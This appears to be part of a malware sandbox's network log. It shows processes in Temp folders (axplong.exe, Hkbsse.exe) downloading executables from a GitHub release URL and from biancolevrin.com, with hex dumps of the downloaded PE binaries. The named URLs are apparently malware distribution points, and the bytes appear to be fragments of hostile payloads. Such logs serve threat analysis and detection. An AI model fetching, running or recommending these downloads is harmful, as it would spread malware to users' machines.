2024-06-27 03:58:35 UTC	970	IN	Data Raw: de 2e 24 85 0e 7c b8 34 f6 20 d2 a1 69 83 47 81 cd a6 36 70 2c 52 1b 08 59 8e e1 16 cf 00 17 15 33 89 f1 64 41 2f 46 8a 30 8e f3 f3 0e 70 03 b0 b3 3f a0 ca 00 b1 9c 3e 09 29 f2 9e 5c 35 c6 86 54 48 cd 7a 02 40 7a 80 6c cd da c5 c0 ad 46 1f ec 07 c2 08 97 5b 89 32 f0 03 60 a3 59 7c 07 f0 24 d3 3d bf e3 11 e6 3f 99 2c e8 95 c9 82 26 15 52 bb 81 53 80 8b 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 Data Ascii: .$\|4 iG6p,RY3dA/F0p?>)\5THz@zlF[2`Y\|$=?,&RS]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49737	140.82.121.3	443	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-27 03:58:54 UTC	98	OUT	GET /frielandrews892/File/releases/download/installer/Installer.exe HTTP/1.1 Host: github.com
2024-06-27 03:58:54 UTC	998	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Thu, 27 Jun 2024 03:58:54 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240627T035854Z&X-Amz-Expires=300&X-Amz-Signature=8324c918359c5367cfdc1d9d5eef365178e8f36844b683c69ab0dfb51d1fff3b&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-06-27 03:58:54 UTC	3030	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49738	185.199.111.133	443	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-27 03:58:54 UTC	589	OUT	GET /github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240627T035854Z&X-Amz-Expires=300&X-Amz-Signature=8324c918359c5367cfdc1d9d5eef365178e8f36844b683c69ab0dfb51d1fff3b&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream HTTP/1.1 Host: objects.githubusercontent.com Connection: Keep-Alive
2024-06-27 03:58:55 UTC	772	IN	HTTP/1.1 200 OK Connection: close Content-Length: 158208 Content-Type: application/octet-stream Last-Modified: Tue, 18 Jun 2024 12:59:30 GMT ETag: "0x8DC8F967E22F003" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: a623d972-601e-0061-4d7f-c1c216000000 x-ms-version: 2020-10-02 x-ms-creation-time: Tue, 18 Jun 2024 12:59:30 GMT x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=Installer.exe x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Thu, 27 Jun 2024 03:58:55 GMT Age: 3791 X-Served-By: cache-iad-kjyo7100172-IAD, cache-ewr18155-EWR X-Cache: HIT, HIT X-Cache-Hits: 467, 1 X-Timer: S1719460735.964729,VS0,VE42
2024-06-27 03:58:55 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 44 d8 fe 65 00 b9 90 36 00 b9 90 36 00 b9 90 36 14 d2 95 37 01 b9 90 36 14 d2 93 37 02 b9 90 36 14 d2 94 37 12 b9 90 36 14 d2 91 37 11 b9 90 36 00 b9 91 36 a0 b9 90 36 14 d2 98 37 0a b9 90 36 14 d2 6f 36 01 b9 90 36 14 d2 92 37 01 b9 90 36 52 69 63 68 00 b9 90 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f8 c4 1b ae 00 00 00 00 00 00 00 00 f0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$De666767676766676o6676Rich6PEd"
2024-06-27 03:58:55 UTC	16384	IN	Data Raw: 7e 00 00 0f 95 c3 8b c3 eb 37 48 8b cf 48 ff 15 6c 46 00 00 0f 1f 44 00 00 ba c1 04 00 00 eb 05 ba c2 04 00 00 89 5c 24 28 45 33 c9 45 33 c0 c7 44 24 20 10 00 00 00 48 8b cd e8 8d 01 00 00 33 c0 4c 8d 5c 24 70 49 8b 5b 30 49 8b 6b 38 49 8b 73 40 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 cc cc cc cc cc cc cc cc cc 48 89 5c 24 18 55 56 57 41 54 41 55 41 56 41 57 48 8b ec 48 83 ec 70 48 8b 05 82 73 00 00 48 33 c4 48 89 45 f8 48 8b da 48 89 4d d0 48 8d 55 e8 4c 8b e1 48 ff 15 0e 48 00 00 0f 1f 44 00 00 44 8b 7d f0 48 8d 55 d8 8b 75 f4 48 8b cb 44 2b 7d e8 2b 75 ec 48 ff 15 ed 47 00 00 0f 1f 44 00 00 8b 7d e0 49 8b cc 44 8b 75 e4 2b 7d d8 44 2b 75 dc 48 ff 15 c8 47 00 00 0f 1f 44 00 00 48 8b c8 ba 08 00 00 00 48 8b d8 48 ff 15 e1 44 00 00 0f 1f 44 00 00 ba 0a 00 Data Ascii: ~7HHlFD\$(E3E3D$ H3L\$pI[0Ik8Is@IA_A^A]A\_H\$UVWATAUAVAWHHpHsH3HEHHMHULHHDD}HUuHD+}+uHGD}IDu+}D+uHGDHHHDD
2024-06-27 03:58:55 UTC	16384	IN	Data Raw: 50 c2 00 40 01 00 00 00 f0 c2 00 40 01 00 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 c0 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 96 00 40 01 00 00 00 50 96 00 40 01 00 00 00 90 96 00 40 01 00 00 00 1b 00 00 00 00 00 00 00 00 75 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: P@@@H@P@@u
2024-06-27 03:58:55 UTC	16384	IN	Data Raw: ff 0d 11 0d 00 00 ff 0d 11 0d 00 00 ff 0d 11 0d 00 00 ff 0d 11 0d 00 00 ff 0d 11 0d 00 00 ff 0d 11 0d 00 00 ff 0d 11 0d 00 00 ff 0d 11 0d 00 00 0a 0d 1b 00 c6 0d 1b 00 0a 0d 00 00 09 0d 00 03 07 03 03 00 19 03 00 03 00 0d 0d 00 c2 0d 00 03 07 03 03 00 19 03 00 03 00 0d 0d 00 07 0d 00 00 09 0d 00 1d 07 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 03 00 00 c4 0d 00 1d 07 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 03 00 00 09 0d 00 00 09 0d 00 1d 07 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 03 00 80 c4 0d 00 1d 07 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 03 00 00 09 0d 00 00 08 0d 00 1e 07 08 0b 08 0b 08 0b 08 0b 08 0b Data Ascii:
2024-06-27 03:58:55 UTC	16384	IN	Data Raw: 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 e0 00 00 00 01 ff 00 00 f7 00 00 00 01 ff 00 00 ff 00 00 00 01 ff 00 00 ff 00 00 00 01 ff 00 00 ff 00 00 00 00 ff 00 00 ff 00 00 00 00 ff 00 00 ff 00 00 00 00 7f 00 00 ff 00 00 00 00 7f 00 00 ff 00 00 00 00 7f 00 00 ff 00 00 00 01 ff 00 00 ff 00 00 00 01 ff 00 00 ff 06 00 00 03 ff 00 00 ff fe 00 Data Ascii:
2024-06-27 03:58:55 UTC	16384	IN	Data Raw: f8 e7 ff fc b7 19 0c fa 43 90 8f a6 ef 2a a2 fa dc 33 56 63 8c a1 ac ff 2b c2 30 a4 dd 3e e2 8d 37 5e 7d c3 5a f3 0f bf f0 85 9f 7e 40 fb 0e 2f 46 8f 24 0e 60 15 fa cb 72 a1 8f ee c5 5b 7b 3a f8 e7 05 fe bc 12 c4 32 94 ab 13 27 3f 6e f7 1b 04 50 a9 9c e7 c2 85 73 14 99 8b 8a 25 c1 9d 4e 9f fb f7 f7 e9 f7 63 f6 77 f7 69 77 3b 74 3a 3d f6 f7 0f 49 92 64 a8 9f 0a 51 ec 49 20 84 40 65 0c 62 16 f0 4f ce c2 62 58 d7 49 a6 e0 68 2a f0 4f 78 42 c6 81 3f 6e 47 98 0f f8 ae 9f 27 81 2f 33 b5 c2 d9 3e dc b9 30 0c f9 e0 07 2f f2 c4 13 0d 7e ff da ab fc c6 6f bc 4d 1c db 13 be fd dc 0e 50 b8 22 4b 01 3e 79 10 90 ca 75 7f 85 ef 07 80 e1 fe fd 3b 1c ec df 23 4d da af 0b a1 be c2 18 2d a3 42 2f 23 35 2f 73 df 24 3a 61 04 7c df 90 75 2e bd 59 b9 34 e6 55 09 94 3a bd dc 59 Data Ascii: C3Vc+0>7^}Z~@/F$`r[{:2'?nPs%Ncwiw;t:=IdQI @ebObXIhOxB?nG'/3>0/~oMP"K>yu;#M-B/#5/s$:a\|u.Y4U:Y
2024-06-27 03:58:55 UTC	16384	IN	Data Raw: 0e 1e 9c 8d 81 bf 98 2f 97 32 fa fe 8d a1 da 04 e0 cf 56 73 3b bb a3 ed bb 82 a0 8f 07 38 c4 f0 dd e5 07 03 81 3e 30 50 5d 1b e6 b3 1b 66 f3 19 83 f3 23 72 75 42 dd 7c 45 81 01 32 48 18 c0 18 14 94 de 22 22 8c 1b 17 da 90 65 3a 23 cf 72 96 26 cc 77 4c c1 f3 43 91 00 af 4f 58 5e fe eb ce 92 be f6 f7 1c d2 fe bb 56 c0 ed 3c 16 4a 80 bf be 8a c0 2e bd 0e f3 bf 8a e0 b8 ad a5 d7 9b 1e f3 b5 cb 81 ff f2 2f ff d2 ff dd df fd 9d f8 8b bf f8 8b 9d 6d a5 94 4e 08 e1 0e a1 e1 76 03 3d 20 84 de 32 18 20 8c 31 a5 36 19 0e e7 6d 0d ac c7 c8 d5 45 40 95 35 13 44 3d c7 54 c7 f8 6c 8e 2c 96 48 b5 41 8a 0a 44 60 62 89 44 78 85 71 12 0b f8 cc 22 6c 83 72 0d 99 cd 71 de 50 08 85 6f b2 d0 57 cf 0b 24 a0 2d 08 e1 22 98 45 21 2c db 54 96 75 0e 61 2d 5a 29 bc 87 d5 a6 a6 a9 57 Data Ascii: /2Vs;8>0P]f#ruB\|E2H""e:#r&wLCOX^V<J./mNv= 2 16mE@5D=Tl,HAD`bDxq"lrqPoW$-"E!,Tua-Z)W
2024-06-27 03:58:55 UTC	16384	IN	Data Raw: 7f f3 ef 6f 32 f1 b6 7d 1e 44 0f 32 79 1f 54 28 74 9e d9 bf 4d 30 6c db a7 ff 3e 8e 62 b2 6c 84 d5 70 74 72 cc b4 5a 12 c5 09 89 48 a9 4d 4d 6d bd 4f 1f 84 40 58 2f fe 2e eb 14 e8 5b 6b a8 9b ba 15 9c 56 07 a0 2f 80 7d d0 4f 64 ea be de bc 96 e7 33 ff d9 eb f6 b4 84 80 85 b5 05 10 73 be 25 10 04 41 97 c1 83 cb a0 42 f4 60 cb a3 6f 11 74 99 bb db 1a c1 e0 b9 a8 bb b0 f0 fa 22 ca fa 81 20 e0 b6 2c c0 8b 80 82 57 af 5e 35 47 47 47 ba 2c 4b 6d 8c 39 33 44 cd 78 06 4e 84 0f 5f 39 15 d3 36 8f 10 4a 6c 9e 96 27 17 bb 97 ce 8f f4 97 c1 0a 90 d2 a0 75 c9 72 d9 90 a6 03 26 bb 57 69 9a 9a 55 be 40 37 35 69 9a 61 2c 14 cb 95 cb ae 4b 35 f1 5e 0d a2 a1 98 8e 68 4a 85 94 38 70 b2 f3 b7 b6 cd 08 e8 7e 0e 9b 5a fe 41 a0 d6 79 26 6f 60 f6 be bb d4 05 40 83 b5 f3 a0 47 3f Data Ascii: o2}D2yT(tM0l>blptrZHMMmO@X/.[kV/}Od3s%AB`ot" ,W^5GGG,Km93DxN_96Jl'ur&WiU@75ia,K5^hJ8p~ZAy&o`@G?
2024-06-27 03:58:55 UTC	16384	IN	Data Raw: ad ad ad ff a0 a0 a0 ff 97 97 98 ff 91 91 91 ff 8b 89 87 ff a0 a3 a2 ff 84 c2 eb ff 81 b8 da ff a9 b6 c1 ff e0 c6 c5 ff e3 c5 c5 ff ef cf cf ff ff ff ff ff bd b2 b2 ff d2 c6 c7 ff e4 d5 d5 ff ed dc dc ff d9 c4 c4 f8 a2 83 83 ff a7 95 95 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc cc cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 68 68 0d 43 43 43 c0 31 31 30 ff 74 6d 6f ff 97 a1 9d ff 47 e5 a7 ff 18 f0 93 ff 3d da 82 ff 7d ad 87 ff 9a 9b 9a ff a6 a5 a8 ff b4 b4 b4 ff c2 c3 c3 ff d2 d1 d1 ff ea ea ea ff f7 f7 f8 ff e6 e6 e6 ff ce cd ce ff ba ba ba ff ae ae ae ff a5 a5 a5 ff 9b 9b 9b ff 9c 96 93 ff a4 b9 c8 ff 81 c4 f0 ff 8e bb d8 ff a3 b4 c1 ff e0 c8 c8 ff e4 c8 c8 ff ef d1 d1 ff ff ff ff ff b7 ac ac ff bc af af ff d4 c7 c6 Data Ascii: hhhCCC110tmoG=}
2024-06-27 03:58:55 UTC	10752	IN	Data Raw: 6e 00 67 00 20 00 73 00 79 00 73 00 74 00 65 00 6d 00 20 00 76 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 69 00 6e 00 66 00 6f 00 72 00 6d 00 61 00 74 00 69 00 6f 00 6e 00 2e 00 21 00 4d 00 65 00 6d 00 6f 00 72 00 79 00 20 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 69 00 6f 00 6e 00 20 00 72 00 65 00 71 00 75 00 65 00 73 00 74 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 00 2e 00 00 00 00 00 23 00 55 00 6e 00 61 00 62 00 6c 00 65 00 20 00 74 00 6f 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 65 00 78 00 74 00 72 00 61 00 63 00 74 00 69 00 6f 00 6e 00 20 00 74 00 68 00 72 00 65 00 61 00 64 00 2e 00 00 00 15 00 43 00 61 00 62 00 69 00 6e 00 65 00 74 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 76 00 61 00 6c 00 69 00 64 00 2e 00 0f 00 46 00 69 Data Ascii: ng system version information.!Memory allocation request failed.#Unable to create extraction thread.Cabinet is not valid.Fi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49743	103.28.36.182	443	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-27 03:58:57 UTC	51	OUT	GET /tmp/1.exe HTTP/1.1 Host: biancolevrin.com
2024-06-27 03:58:58 UTC	223	IN	HTTP/1.1 200 OK Date: Thu, 27 Jun 2024 03:58:58 GMT Server: Apache Last-Modified: Wed, 26 Jun 2024 03:25:02 GMT Accept-Ranges: bytes Content-Length: 324608 Connection: close Content-Type: application/x-msdownload
2024-06-27 03:58:58 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c c9 37 16 08 a8 59 45 08 a8 59 45 08 a8 59 45 16 fa dd 45 2a a8 59 45 16 fa cc 45 1b a8 59 45 16 fa da 45 7a a8 59 45 2f 6e 22 45 03 a8 59 45 08 a8 58 45 78 a8 59 45 16 fa d3 45 09 a8 59 45 16 fa cd 45 09 a8 59 45 16 fa c8 45 09 a8 59 45 52 69 63 68 08 a8 59 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1c 5c 51 64 00 00 00 00 00 00 00 00 e0 00 03 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$L7YEYEYEE*YEEYEEzYE/n"EYEXExYEEYEEYEEYERichYEPEL\Qd
2024-06-27 03:58:58 UTC	16384	IN	Data Raw: 00 3c 64 0f 84 d5 07 00 00 3c 69 0f 84 cd 07 00 00 3c 6f 0f 84 c5 07 00 00 3c 75 0f 84 bd 07 00 00 3c 78 0f 84 b5 07 00 00 3c 58 0f 84 ad 07 00 00 89 b5 94 fd ff ff 8d 85 a4 fd ff ff 50 0f b6 c2 50 89 b5 c8 fd ff ff e8 19 34 00 00 59 85 c0 8a 85 ef fd ff ff 59 74 22 8b 8d b4 fd ff ff 8d b5 d8 fd ff ff e8 a4 fb ff ff 8a 03 43 89 9d c4 fd ff ff 84 c0 0f 84 a4 fc ff ff 8b 8d b4 fd ff ff 8d b5 d8 fd ff ff e8 82 fb ff ff e9 4d 07 00 00 0f be c2 83 f8 64 0f 8f e8 01 00 00 0f 84 79 02 00 00 83 f8 53 0f 8f f2 00 00 00 0f 84 80 00 00 00 83 e8 41 74 10 48 48 74 58 48 48 74 08 48 48 0f 85 92 05 00 00 80 c2 20 c7 85 90 fd ff ff 01 00 00 00 88 95 ef fd ff ff 83 8d f0 fd ff ff 40 39 b5 e8 fd ff ff 8d 9d f4 fd ff ff b8 00 02 00 00 89 9d e4 fd ff ff 89 85 a0 fd ff ff 0f Data Ascii: <d<i<o<u<x<XPP4YYt"CMdySAtHHtXHHtHH @9
2024-06-27 03:58:58 UTC	16384	IN	Data Raw: e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4c 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 64 2b c1 75 44 e8 bb b2 ff ff 8b f8 89 7d d8 85 ff 75 14 83 c8 ff e9 61 01 00 00 be bc 14 43 00 a1 bc 14 43 00 eb 60 ff 77 5c 8b d3 e8 5d ff ff ff 8b f0 83 c6 08 8b 06 eb 5a 8b c3 83 e8 0f 74 3c 83 e8 06 74 2b 48 74 1c e8 88 8b ff ff c7 00 16 00 00 00 33 c0 50 50 50 50 50 e8 c9 8f ff ff 83 c4 14 eb ae be c4 14 43 00 a1 c4 14 43 00 eb 16 be c0 14 43 00 a1 c0 14 43 00 eb 0a be c8 14 43 00 a1 c8 14 43 00 c7 45 e4 01 00 00 00 50 e8 5e b0 ff ff 89 45 e0 59 33 c0 83 7d e0 01 0f 84 d8 00 00 00 39 45 e0 75 07 6a 03 e8 ee b9 ff ff 39 45 e4 74 07 50 e8 2f ad ff ff 59 33 c0 89 45 fc 83 fb 08 74 0a 83 fb 0b 74 05 83 fb 04 75 1b 8b 4f 60 89 4d d4 89 47 60 83 fb 08 75 40 8b 4f 64 Data Ascii: }]LtjY+t"+t+td+uD}uaCC`w\]Zt<t+Ht3PPPPPCCCCCCEP^EY3}9Euj9EtP/Y3EttuO`MG`u@Od
2024-06-27 03:58:58 UTC	16384	IN	Data Raw: ff ff 83 c4 14 8b 4d fc 5f 89 73 0c 5e 8b c3 33 cd 5b e8 e9 43 ff ff c9 c3 cc cc cc cc cc cc cc 57 56 55 33 ff 33 ed 8b 44 24 14 0b c0 7d 15 47 45 8b 54 24 10 f7 d8 f7 da 83 d8 00 89 44 24 14 89 54 24 10 8b 44 24 1c 0b c0 7d 14 47 8b 54 24 18 f7 d8 f7 da 83 d8 00 89 44 24 1c 89 54 24 18 0b c0 75 28 8b 4c 24 18 8b 44 24 14 33 d2 f7 f1 8b d8 8b 44 24 10 f7 f1 8b f0 8b c3 f7 64 24 18 8b c8 8b c6 f7 64 24 18 03 d1 eb 47 8b d8 8b 4c 24 18 8b 54 24 14 8b 44 24 10 d1 eb d1 d9 d1 ea d1 d8 0b db 75 f4 f7 f1 8b f0 f7 64 24 1c 8b c8 8b 44 24 18 f7 e6 03 d1 72 0e 3b 54 24 14 77 08 72 0f 3b 44 24 10 76 09 4e 2b 44 24 18 1b 54 24 1c 33 db 2b 44 24 10 1b 54 24 14 4d 79 07 f7 da f7 d8 83 da 00 8b ca 8b d3 8b d9 8b c8 8b c6 4f 75 07 f7 da f7 d8 83 da 00 5d 5e 5f c2 10 00 Data Ascii: M_s^3[CWVU33D$}GET$D$T$D$}GT$D$T$u(L$D$3D$d$d$GL$T$D$ud$D$r;T$wr;D$vN+D$T$3+D$T$MyOu]^_
2024-06-27 03:58:58 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-06-27 03:58:58 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-06-27 03:58:59 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
